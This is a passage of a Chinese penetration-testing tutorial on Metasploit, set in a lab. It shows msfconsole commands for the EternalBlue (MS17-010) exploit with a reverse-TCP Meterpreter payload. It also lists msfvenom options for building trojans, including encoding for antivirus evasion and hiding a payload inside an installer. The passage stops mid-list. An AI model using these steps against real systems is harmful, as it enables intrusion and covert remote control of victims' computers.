Metasploit(MSF)使用详解

一、概要

在渗透测试中,通常利用Metasplpit Framework和Cobalt Strike生成木马进行使用,本次我们以Metasploit进行演示

二、实验环境

使用机器:
攻击机:kali虚拟机 192.168.36.129
靶 机:win8.1 192.168.36.130
(确保你的kali是能够被ping通的,后面会做解释)

三、使用方法

1.基础使用

msfconsole								      #进入框架
search  ms17_010                              # 使用search命令查找相关漏洞
use exploit/windows/smb/ms17_010_eternalblue        # 使用use选择模块
set payload windows/x64/meterpreter/reverse_tcp    	#设置攻击载荷
show options    	/		options        			#查看模块需要配置的参数
set RHOST ip/ip段  					                #RHOSTS 参数是要探测主机的ip或ip范围,可以探测一个ip范围内的主机是否存在漏洞
exploit   /   run     							    #启用监听--攻击

示例中是以MS17_010(永恒之蓝)smb漏洞进行攻击,但是现在新版Windows这个漏洞大都被修复了,所以我们用另一种方式进行渗透↓

2.msfvenum模块

常用参数介绍:

-l  --list <type> 列出模块的所有可用资源
 
-p   --payload < payload> 也可使用自定义的payload,几乎是支持全平台的(Windows、Linux、iOS、Android)
 
-a   --arch < architecture> 指定payload的目标架构,一般是x86(32位平台)和x64(64位平台)
 
-o   --out < path> 指定创建好的payload的存放位置
 
-s   --space < length> 设定有效攻击荷载的最大长度,就是文件大小(一般木马文件只有几kb)
 
-i   --iterations < count> 指定payload的编码次数(理论上次数越多越容易免杀……但不能代替免杀)
 
-c   --add-code < path> 指定一个附加的win32 shellcode文件
 
-x  --template < path> 指定一个自定义的可执行文件作为模板,并将payload嵌入其中(因为做出来的木马文件,运行后并没有任何效果出现,为了更加的真实,可以将木马文件嵌入到一个安装包或压缩包等文件中)
 
-k  --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
 
--platform < platform> 指定p
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值